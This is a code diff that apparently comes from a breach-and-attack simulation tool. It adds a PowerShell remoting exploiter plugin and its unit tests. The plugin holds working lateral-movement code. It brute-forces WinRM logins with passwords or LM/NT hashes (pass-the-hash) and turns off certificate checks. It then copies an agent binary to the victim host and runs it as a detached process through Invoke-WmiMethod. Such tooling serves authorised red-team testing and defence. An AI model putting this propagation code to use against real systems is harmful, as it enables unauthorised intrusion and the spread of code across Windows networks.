diff --git a/monkey/agent_plugins/exploiters/powershell/src/plugin.py b/monkey/agent_plugins/exploiters/powershell/src/plugin.py index 3403b290fdc..7cc1bab9f06 100644 --- a/monkey/agent_plugins/exploiters/powershell/src/plugin.py +++ b/monkey/agent_plugins/exploiters/powershell/src/plugin.py @@ -4,10 +4,11 @@ from typing import Any, Dict, Sequence # common imports +from common import OperatingSystem from common.event_queue import IAgentEventPublisher -from common.types import AgentID, Event, NetworkPort +from common.types import AgentID, Event from common.utils.code_utils import del_key -from common.utils.environment import is_windows_os +from common.utils.environment import get_os # dependencies to get rid of or internalize from infection_monkey.exploit import IAgentBinaryRepository, IAgentOTPProvider @@ -22,24 +23,17 @@ from .credentials_generator import generate_powershell_credentials from .powershell_command_builder import build_powershell_command +from .powershell_consts import POWERSHELL_NO_SSL_PORT, POWERSHELL_SSL_PORT from .powershell_options import PowerShellOptions +from .powershell_remote_access_client_factory import PowerShellRemoteAccessClientFactory logger = logging.getLogger(__name__) -POWERSHELL_NO_SSL_PORT = NetworkPort(5985) -POWERSHELL_SSL_PORT = NetworkPort(5986) - - def should_attempt_exploit(host: TargetHost) -> bool: return not all_tcp_ports_are_closed(host, [POWERSHELL_NO_SSL_PORT, POWERSHELL_SSL_PORT]) -class StubPowerShellRemoteAccessClientFactory: - def __init__(*args, **kwargs): - pass - - class Plugin: def __init__( self, @@ -56,9 +50,10 @@ def __init__( self._agent_id = agent_id self._agent_event_publisher = agent_event_publisher self._agent_binary_repository = agent_binary_repository + running_on_windows = get_os() == OperatingSystem.WINDOWS credentials_generator = partial( generate_powershell_credentials, - running_from_windows=is_windows_os(), + running_from_windows=running_on_windows, ) self._credentials_provider = BruteForceCredentialsProvider( propagation_credentials_repository, credentials_generator @@ -98,10 +93,9 @@ def run( self._agent_id, servers, current_depth, - remote_agent_binary_destination_path=get_agent_dst_path(host), otp_provider=self._otp_provider, ) - powershell_exploit_client_factory = StubPowerShellRemoteAccessClientFactory( + powershell_exploit_client_factory = PowerShellRemoteAccessClientFactory( host, powershell_options, command_builder ) diff --git a/monkey/agent_plugins/exploiters/powershell/src/powershell_authentication_options.py b/monkey/agent_plugins/exploiters/powershell/src/powershell_authentication_options.py new file mode 100644 index 00000000000..dc40e2d3a71 --- /dev/null +++ b/monkey/agent_plugins/exploiters/powershell/src/powershell_authentication_options.py @@ -0,0 +1,62 @@ +from dataclasses import dataclass +from enum import Enum + +from common.credentials import Credentials, LMHash, NTHash, Password, get_plaintext +from infection_monkey.i_puppet import TargetHost + +from .powershell_consts import POWERSHELL_SSL_PORT + + +class AuthenticationType(Enum): + BASIC = "basic" + NEGOTIATE = "negotiate" + NTLM = "ntlm" + + +class EncryptionSetting(Enum): + AUTO = "auto" + NEVER = "never" + + +@dataclass +class AuthenticationOptions: + authentication_type: AuthenticationType + encryption_setting: EncryptionSetting + ssl_enabled: bool + + +def get_auth_options(credentials: Credentials, host: TargetHost) -> AuthenticationOptions: + ssl_enabled = _get_ssl_enabled_option(credentials, host) + authentication_type = _get_authentication_type(credentials) + encryption_setting = _get_encryption_setting(credentials) + + return AuthenticationOptions(authentication_type, encryption_setting, ssl_enabled) + + +def _get_ssl_enabled_option(credentials: Credentials, host: TargetHost) -> bool: + # Passwordless login only works with SSL false, + # AuthenticationType.BASIC and EncryptionSetting.NEVER + if isinstance(credentials.secret, Password): + if get_plaintext(credentials.secret.password) == "": + return False + + # Check if default PSRemoting ports are open. Prefer with SSL, if both are. + return POWERSHELL_SSL_PORT in host.ports_status.tcp_ports.open + + +def _get_authentication_type(credentials: Credentials): + if isinstance(credentials.secret, Password): + if get_plaintext(credentials.secret.password) == "": + return AuthenticationType.BASIC + + if isinstance(credentials.secret, LMHash) or isinstance(credentials.secret, NTHash): + return AuthenticationType.NTLM + + return AuthenticationType.NEGOTIATE + + +def _get_encryption_setting(credentials: Credentials): + secret = None + if isinstance(credentials.secret, Password): + secret = get_plaintext(credentials.secret.password) + return EncryptionSetting.NEVER if secret == "" else EncryptionSetting.AUTO diff --git a/monkey/agent_plugins/exploiters/powershell/src/powershell_client.py b/monkey/agent_plugins/exploiters/powershell/src/powershell_client.py new file mode 100644 index 00000000000..e700e3c23f3 --- /dev/null +++ b/monkey/agent_plugins/exploiters/powershell/src/powershell_client.py @@ -0,0 +1,143 @@ +import logging +from pathlib import Path, PurePath +from typing import Optional + +import pypsrp +import spnego +from pypsrp.client import Client +from pypsrp.exceptions import AuthenticationError # noqa: F401 +from pypsrp.powershell import PowerShell, RunspacePool +from urllib3 import connectionpool + +from common.credentials import Credentials, LMHash, NTHash, Password, Username, get_plaintext +from infection_monkey.i_puppet import TargetHost + +from .powershell_authentication_options import AuthenticationOptions + +logger = logging.getLogger(__name__) + + +def _set_sensitive_packages_log_level_to_error(): + # If root logger is inherited, extensive and potentially sensitive info could be logged + sensitive_packages = [pypsrp, spnego, connectionpool] + for package in sensitive_packages: + logging.getLogger(package.__name__).setLevel(logging.ERROR) + + +# The pypsrp library requires LM or NT hashes to be formatted like "LM_HASH:NT_HASH" +# +# Example: +# If your LM hash is 1ec78eb5f6edd379351858c437fc3e4e and your NT hash is +# 79a760336ad8c808fee32aa96985a305, then you would pass +# "1ec78eb5f6edd379351858c437fc3e4e:79a760336ad8c808fee32aa96985a305" as the +# `password` parameter to pypsrp. +# +# In our case, we have a set of NT hashes and a set of LM hashes, but we don't +# know if any particular LM/NT hash pair was generated from the same password. +# To avoid confusion, we pair each NT or LM hash with a dummy (i.e. all zeros) +# hash. +def format_password(credentials: Credentials) -> Optional[str]: + secret = credentials.secret + + if not secret: + return secret + + if isinstance(secret, Password): + plaintext_secret = get_plaintext(secret.password) + return plaintext_secret + + if isinstance(secret, LMHash): + plaintext_secret = get_plaintext(secret.lm_hash) + return f"{plaintext_secret}:00000000000000000000000000000000" + + if isinstance(secret, NTHash): + plaintext_secret = get_plaintext(secret.nt_hash) + return f"00000000000000000000000000000000:{plaintext_secret}" + + raise ValueError(f"Unknown secret type {type(secret)}") + + +class PowerShellClient: + """ + A client for executing commands on a remote host using PowerShell. + """ + + def __init__(self): + _set_sensitive_packages_log_level_to_error() + + self._client = None + self._authenticated = False + + def connect( + self, + host: TargetHost, + credentials: Credentials, + auth_options: AuthenticationOptions, + timeout: float, + ): + """ + Connects to the remote host using the given credentials. + + :param host: The host to connect to + :param credentials: The credentials to use + :param auth_options: The authentication options to use + :param timeout: The timeout for the connection + :raises Exception: If an error occurred while attempting to connect + """ + username = ( + credentials.identity.username + if isinstance(credentials.identity, Username) + else credentials.identity + ) + self._client = Client( + str(host.ip), + username=username, + password=format_password(credentials), + cert_validation=False, + auth=auth_options.authentication_type.value, + encryption=auth_options.encryption_setting.value, + ssl=auth_options.ssl_enabled, + connection_timeout=timeout, + ) + + # Attempt to execute dir command to know if authentication was successful. + # This will raise an exception if authentication was not successful. + self._client.execute_cmd("dir") + self._authenticated = True + logger.debug("Successfully authenticated to remote PowerShell service") + + def connected(self) -> bool: + return self._authenticated + + def copy_file(self, src: Path, dest: PurePath): + """ + Copies a file from the local machine to the remote machine. + + :param src: The path to the file to copy + :param dest: The destination path on the remote machine + :raises Exception: If an error occurred while attempting to copy the file + """ + try: + self._client.copy(str(src), str(dest)) # type: ignore[union-attr] + logger.debug(f"Successfully copied {src}") + except Exception as err: + logger.error(f"Failed to copy {src} to {dest}: {err}") + raise err + + def execute_cmd_as_detached_process(self, cmd: str): + """ + Executes a command on the remote host. The command will be executed in detached process + + :param cmd: The command to execute + :raises Exception: If an error occurred while attempting to execute the command + """ + logger.debug("Attempting to execute a command on the remote host as a detached process.") + with ( + self._client.wsman, # type: ignore[union-attr] + RunspacePool(self._client.wsman) as pool, # type: ignore[union-attr] + ): + ps = PowerShell(pool) + ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter( + "name", "create" + ).add_parameter("ArgumentList", cmd) + ps.invoke() diff --git a/monkey/agent_plugins/exploiters/powershell/src/powershell_consts.py b/monkey/agent_plugins/exploiters/powershell/src/powershell_consts.py new file mode 100644 index 00000000000..87f214ba4cb --- /dev/null +++ b/monkey/agent_plugins/exploiters/powershell/src/powershell_consts.py @@ -0,0 +1,4 @@ +from common.types import NetworkPort + +POWERSHELL_NO_SSL_PORT = NetworkPort(5985) +POWERSHELL_SSL_PORT = NetworkPort(5986) diff --git a/monkey/agent_plugins/exploiters/powershell/src/powershell_remote_access_client.py b/monkey/agent_plugins/exploiters/powershell/src/powershell_remote_access_client.py new file mode 100644 index 00000000000..123f07f279a --- /dev/null +++ b/monkey/agent_plugins/exploiters/powershell/src/powershell_remote_access_client.py @@ -0,0 +1,113 @@ +import logging +from pathlib import Path, PurePath +from typing import Callable, Collection, Set, Type + +from common import OperatingSystem +from common.credentials import Credentials +from common.tags import ( + BRUTE_FORCE_T1110_TAG, + EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG, + INGRESS_TOOL_TRANSFER_T1105_TAG, + REMOTE_SERVICES_T1021_TAG, + SYSTEM_SERVICES_T1569_TAG, +) +from infection_monkey.exploit.tools import ( + IRemoteAccessClient, + RemoteAuthenticationError, + RemoteCommandExecutionError, + RemoteFileCopyError, +) +from infection_monkey.exploit.tools.helpers import get_random_file_suffix +from infection_monkey.i_puppet import TargetHost + +from .powershell_authentication_options import get_auth_options +from .powershell_client import PowerShellClient +from .powershell_options import PowerShellOptions + +logger = logging.getLogger(__name__) +LOGIN_TAGS = { + REMOTE_SERVICES_T1021_TAG, + BRUTE_FORCE_T1110_TAG, + EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG, +} +COPY_FILE_TAGS = { + INGRESS_TOOL_TRANSFER_T1105_TAG, +} +EXECUTION_TAGS = { + REMOTE_SERVICES_T1021_TAG, + EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG, + SYSTEM_SERVICES_T1569_TAG, +} + + +class PowerShellRemoteAccessClient(IRemoteAccessClient): + def __init__( + self, + host: TargetHost, + options: PowerShellOptions, + command_builder: Callable[[OperatingSystem, PurePath], str], + powershell_client: PowerShellClient, + ): + self._host = host + self._options = options + self._command_builder = command_builder + self._powershell_client = powershell_client + + def login(self, credentials: Credentials, tags: Set[str]): + tags.update(LOGIN_TAGS) + + try: + auth_options = get_auth_options(credentials, self._host) + self._powershell_client.connect( + self._host, credentials, auth_options, timeout=self._options.winrm_connect_timeout + ) + except Exception as err: + error_message = f"Failed to authenticate over PowerShell with {credentials}: {err}" + raise RemoteAuthenticationError(error_message) + + def _raise_if_not_authenticated(self, error_type: Type[Exception]): + if not self._powershell_client.connected(): + raise error_type( + "This operation cannot be performed until authentication is successful" + ) + + def get_os(self) -> OperatingSystem: + return OperatingSystem.WINDOWS + + def execute_agent(self, agent_binary_path: PurePath, tags: Set[str]): + self._raise_if_not_authenticated(RemoteCommandExecutionError) + + try: + tags.update(EXECUTION_TAGS) + self._powershell_client.execute_cmd_as_detached_process( + self._command_builder(self.get_os(), agent_binary_path) + ) + except Exception as err: + raise RemoteCommandExecutionError(err) + + def copy_file(self, file: bytes, destination_path: PurePath, tags: Set[str]): + self._raise_if_not_authenticated(RemoteFileCopyError) + temp_monkey_binary_filepath = Path(f"./monkey_temp_bin_{get_random_file_suffix()}") + + logger.debug( + f"Trying to copy monkey file to [{destination_path}] on victim {self._host.ip}" + ) + + self._create_local_agent_file(file, temp_monkey_binary_filepath) + + try: + logger.info(f"Attempting to copy the monkey agent binary to {self._host.ip}") + self._powershell_client.copy_file(temp_monkey_binary_filepath, destination_path) + tags.update(COPY_FILE_TAGS) + except Exception as err: + raise RemoteFileCopyError(f"Failed to copy the agent binary to the victim: {err}") + finally: + if temp_monkey_binary_filepath.is_file(): + temp_monkey_binary_filepath.unlink() + + def _create_local_agent_file(self, file: bytes, binary_path: Path): + with open(binary_path, "wb") as f: + f.write(file) + + def get_writable_paths(self) -> Collection[PurePath]: + return [] diff --git a/monkey/agent_plugins/exploiters/powershell/src/powershell_remote_access_client_factory.py b/monkey/agent_plugins/exploiters/powershell/src/powershell_remote_access_client_factory.py new file mode 100644 index 00000000000..96bc4ec7784 --- /dev/null +++ b/monkey/agent_plugins/exploiters/powershell/src/powershell_remote_access_client_factory.py @@ -0,0 +1,27 @@ +from pathlib import PurePath +from typing import Any, Callable + +from common import OperatingSystem +from infection_monkey.exploit.tools import IRemoteAccessClientFactory +from infection_monkey.i_puppet import TargetHost + +from .powershell_client import PowerShellClient +from .powershell_options import PowerShellOptions +from .powershell_remote_access_client import PowerShellRemoteAccessClient + + +class PowerShellRemoteAccessClientFactory(IRemoteAccessClientFactory): + def __init__( + self, + host: TargetHost, + options: PowerShellOptions, + command_builder: Callable[[OperatingSystem, PurePath], str], + ): + self._host = host + self._options = options + self._command_builder = command_builder + + def create(self, **kwargs: Any) -> PowerShellRemoteAccessClient: + return PowerShellRemoteAccessClient( + self._host, self._options, self._command_builder, PowerShellClient() + ) diff --git a/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/conftest.py b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/conftest.py new file mode 100644 index 00000000000..8737b3a9dd7 --- /dev/null +++ b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/conftest.py @@ -0,0 +1,48 @@ +from unittest.mock import MagicMock + +import pytest + +from common import OperatingSystem +from common.types import NetworkPort, NetworkProtocol, PortStatus +from infection_monkey.i_puppet import PortScanData, TargetHostPorts + + +def _create_windows_host(http_enabled, https_enabled): + no_ssl_enabled_port = NetworkPort(5985) + ssl_enabled_port = NetworkPort(5986) + + host = MagicMock() + host.operating_system = OperatingSystem.WINDOWS + host.ports_status = TargetHostPorts() + + if http_enabled: + host.ports_status.tcp_ports[no_ssl_enabled_port] = PortScanData( + port=no_ssl_enabled_port, status=PortStatus.OPEN, protocol=NetworkProtocol.TCP + ) + + if https_enabled: + host.ports_status.tcp_ports[ssl_enabled_port] = PortScanData( + port=ssl_enabled_port, status=PortStatus.OPEN, protocol=NetworkProtocol.TCP + ) + + return host + + +@pytest.fixture +def https_only_host(): + return _create_windows_host(False, True) + + +@pytest.fixture +def http_only_host(): + return _create_windows_host(True, False) + + +@pytest.fixture +def http_and_https_both_enabled_host(): + return _create_windows_host(True, True) + + +@pytest.fixture +def powershell_disabled_host(): + return _create_windows_host(False, False) diff --git a/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_authentication_options.py b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_authentication_options.py new file mode 100644 index 00000000000..517ef019fd3 --- /dev/null +++ b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_authentication_options.py @@ -0,0 +1,80 @@ +import pytest +from agent_plugins.exploiters.powershell.src.powershell_authentication_options import ( + AuthenticationType, + EncryptionSetting, + get_auth_options, +) + +from common.credentials import Credentials, LMHash, NTHash, Password, Username + +CREDENTIALS_WITH_PASSWORD = Credentials( + identity=Username(username="user1"), secret=Password(password="password1") +) +CREDENTIALS_EMPTY_PASSWORD = Credentials( + identity=Username(username="user2"), secret=Password(password="") +) +CREDENTIALS_NONE_PASSWORD = Credentials(identity=Username(username="user3"), secret=None) +CREDENTIALS_LM_HASH = Credentials( + identity=Username(username="user4"), secret=LMHash(lm_hash="c080132b6f2a0c4e5d1029cc06f48a92") +) +CREDENTIALS_NT_HASH = Credentials( + identity=Username(username="user5"), secret=NTHash(nt_hash="E9F85516721DDC218359AD5280DB4450") +) + + +@pytest.mark.parametrize( + "credentials, host_fixture, expected_ssl_enabled", + [ + # SSL is enabled if the host has an open HTTPS port + (CREDENTIALS_WITH_PASSWORD, "https_only_host", True), + (CREDENTIALS_WITH_PASSWORD, "http_and_https_both_enabled_host", True), + # SSL is enabled if the credentials password is None AND the host has an open HTTPS port + (CREDENTIALS_NONE_PASSWORD, "https_only_host", True), + (CREDENTIALS_NONE_PASSWORD, "http_only_host", False), + # SSL is disabled if the host has no open HTTPS port + (CREDENTIALS_WITH_PASSWORD, "http_only_host", False), + (CREDENTIALS_WITH_PASSWORD, "powershell_disabled_host", False), + # SSL is disabled if the credentials password is empty + (CREDENTIALS_EMPTY_PASSWORD, "https_only_host", False), + (CREDENTIALS_EMPTY_PASSWORD, "http_only_host", False), + ], +) +def test_get_auth_options__ssl_enabled(credentials, host_fixture, expected_ssl_enabled, request): + host = request.getfixturevalue(host_fixture) + auth_options = get_auth_options(credentials, host) + assert auth_options.ssl_enabled is expected_ssl_enabled + + +@pytest.mark.parametrize( + "credentials, expected_auth", + [ + # Basic auth is used if the credentials password is empty + (CREDENTIALS_EMPTY_PASSWORD, AuthenticationType.BASIC), + # Negotiate auth is used if the credentials is password or cached (None) + (CREDENTIALS_WITH_PASSWORD, AuthenticationType.NEGOTIATE), + (CREDENTIALS_NONE_PASSWORD, AuthenticationType.NEGOTIATE), + # NTLM auth is used if the credentials is LM or NT hash + (CREDENTIALS_LM_HASH, AuthenticationType.NTLM), + (CREDENTIALS_NT_HASH, AuthenticationType.NTLM), + ], +) +def test_get_auth_options__authentication_type(credentials, expected_auth, http_only_host): + auth_options = get_auth_options(credentials, http_only_host) + + assert auth_options.authentication_type == expected_auth + + +@pytest.mark.parametrize( + "credentials, expected_encryption_setting", + [ + (CREDENTIALS_WITH_PASSWORD, EncryptionSetting.AUTO), + (CREDENTIALS_EMPTY_PASSWORD, EncryptionSetting.NEVER), + (CREDENTIALS_NONE_PASSWORD, EncryptionSetting.AUTO), + ], +) +def test_get_auth_options__encryption_setting_with_password( + credentials, expected_encryption_setting, http_only_host +): + auth_options = get_auth_options(credentials, http_only_host) + + assert auth_options.encryption_setting == expected_encryption_setting diff --git a/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_client_plugin.py b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_client_plugin.py new file mode 100644 index 00000000000..52a39cdc3e1 --- /dev/null +++ b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_client_plugin.py @@ -0,0 +1,54 @@ +import pytest +from agent_plugins.exploiters.powershell.src.powershell_client import format_password +from pydantic import SecretStr + +from common.credentials import Credentials, LMHash, NTHash, Password, SSHKeypair, Username + + +def test_format_cached_credentials(): + expected = None + creds = Credentials(identity=Username(username="test_user"), secret=expected) + + actual = format_password(creds) + + assert expected == actual + + +def test_format_password(): + expected = SecretStr("test_password") + creds = Credentials(identity=Username(username="test_user"), secret=Password(password=expected)) + + actual = format_password(creds) + + assert expected.get_secret_value() == actual + + +def test_format_lm_hash(): + lm_hash = SecretStr("c080132b6f2a0c4e5d1029cc06f48a92") + expected = f"{lm_hash.get_secret_value()}:00000000000000000000000000000000" + creds = Credentials(identity=Username(username="test_user"), secret=LMHash(lm_hash=lm_hash)) + + actual = format_password(creds) + + assert expected == actual + + +def test_format_nt_hash(): + nt_hash = SecretStr("c080132b6f2a0c4e5d1029cc06f48a92") + expected = f"00000000000000000000000000000000:{nt_hash.get_secret_value()}" + + creds = Credentials(identity=Username(username="test_user"), secret=NTHash(nt_hash=nt_hash)) + + actual = format_password(creds) + + assert expected == actual + + +def test_invalid_secret_type(): + creds = Credentials( + identity=Username(username="test_user"), + secret=SSHKeypair(public_key="pkey", private_key="private_key"), + ) + + with pytest.raises(ValueError): + format_password(creds) diff --git a/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_remote_access_client.py b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_remote_access_client.py new file mode 100644 index 00000000000..bcbe99acb9d --- /dev/null +++ b/monkey/tests/unit_tests/agent_plugins/exploiters/powershell/test_powershell_remote_access_client.py @@ -0,0 +1,163 @@ +from ipaddress import IPv4Address +from pathlib import PureWindowsPath +from typing import List +from unittest.mock import MagicMock + +import pytest +from agent_plugins.exploiters.powershell.src.powershell_client import PowerShellClient +from agent_plugins.exploiters.powershell.src.powershell_options import PowerShellOptions +from agent_plugins.exploiters.powershell.src.powershell_remote_access_client import ( + COPY_FILE_TAGS, + EXECUTION_TAGS, + LOGIN_TAGS, + PowerShellRemoteAccessClient, +) +from tests.data_for_tests.propagation_credentials import FULL_CREDENTIALS + +from common import OperatingSystem +from common.credentials import Credentials +from infection_monkey.exploit import IAgentBinaryRepository +from infection_monkey.exploit.tools import ( + RemoteAuthenticationError, + RemoteCommandExecutionError, + RemoteFileCopyError, +) +from infection_monkey.i_puppet import TargetHost + +EXPLOITER_TAGS = {"powershell-exploiter", "unit-test"} +CREDENTIALS: List[Credentials] = [] +DESTINATION_PATH = PureWindowsPath("C:\\destination_path") +FILE = b"file content" +TARGET_HOST = TargetHost(ip=IPv4Address("1.1.1.1"), operating_system=OperatingSystem.WINDOWS) + + +def stub_command_builder(*args, **kwargs): + return "command" + + +@pytest.fixture +def mock_powershell_client(): + client = MagicMock(spec=PowerShellClient) + client.connected.return_value = False + + def set_connected(value: bool): + client.connected.return_value = value + + client.connect.side_effect = lambda *_, **__: set_connected(True) + + return client + + +@pytest.fixture +def mock_agent_binary_repository() -> IAgentBinaryRepository: + return MagicMock(spec=IAgentBinaryRepository) + + +@pytest.fixture +def powershell_remote_access_client(mock_powershell_client) -> PowerShellRemoteAccessClient: + return PowerShellRemoteAccessClient( + TARGET_HOST, PowerShellOptions(), stub_command_builder, mock_powershell_client + ) + + +def test_login__succeeds( + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + + powershell_remote_access_client.login(FULL_CREDENTIALS[0], tags) + + assert tags == EXPLOITER_TAGS.union(LOGIN_TAGS) + + +def test_login__fails( + mock_powershell_client: PowerShellClient, + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + mock_powershell_client.connect.side_effect = Exception() + + with pytest.raises(RemoteAuthenticationError): + powershell_remote_access_client.login(FULL_CREDENTIALS[0], tags) + + assert tags == EXPLOITER_TAGS.union(LOGIN_TAGS) + + +def test_execute__fails_if_not_authenticated( + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + + with pytest.raises(RemoteCommandExecutionError): + powershell_remote_access_client.execute_agent(DESTINATION_PATH, tags) + + assert tags == EXPLOITER_TAGS + + +def test_execute__fails_if_command_not_executed( + mock_powershell_client: PowerShellClient, + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + mock_powershell_client.execute_cmd_as_detached_process.side_effect = Exception("file") + powershell_remote_access_client.login(FULL_CREDENTIALS[0], set()) + + with pytest.raises(RemoteCommandExecutionError): + powershell_remote_access_client.execute_agent(DESTINATION_PATH, tags) + + assert tags == EXPLOITER_TAGS.union(EXECUTION_TAGS) + + +def test_execute__succeeds( + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + + powershell_remote_access_client.login(FULL_CREDENTIALS[0], set()) + powershell_remote_access_client.execute_agent(DESTINATION_PATH, tags) + + assert tags == EXPLOITER_TAGS.union(EXECUTION_TAGS) + + +def test_copy_file__fails_if_not_authenticated( + mock_powershell_client: PowerShellClient, + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + mock_powershell_client.connected.return_value = False + + with pytest.raises(RemoteFileCopyError): + powershell_remote_access_client.copy_file(FILE, DESTINATION_PATH, tags) + + assert tags == EXPLOITER_TAGS + + +def test_copy_file__fails_if_client_copy_fails( + mock_powershell_client: PowerShellClient, + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + mock_powershell_client.connected.return_value = True + mock_powershell_client.copy_file.side_effect = Exception("file") + + with pytest.raises(RemoteFileCopyError): + powershell_remote_access_client.copy_file(FILE, DESTINATION_PATH, tags) + + assert tags == EXPLOITER_TAGS + + +def test_copy_file__success( + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + tags = EXPLOITER_TAGS.copy() + powershell_remote_access_client.login(FULL_CREDENTIALS[0], set()) + + powershell_remote_access_client.copy_file(FILE, DESTINATION_PATH, tags) + + assert tags == EXPLOITER_TAGS.union(COPY_FILE_TAGS) + + +def test_get_writtable_paths__is_empty( + powershell_remote_access_client: PowerShellRemoteAccessClient, +): + assert powershell_remote_access_client.get_writable_paths() == []